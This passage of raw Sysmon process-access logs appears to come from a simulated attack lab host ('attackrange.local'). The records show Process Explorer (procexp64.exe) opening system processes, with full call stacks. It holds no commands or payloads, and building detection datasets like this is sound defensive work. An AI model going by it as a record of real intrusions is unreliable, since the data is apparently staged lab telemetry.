tdll.dll+51791 10341000x8000000000000000791069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Use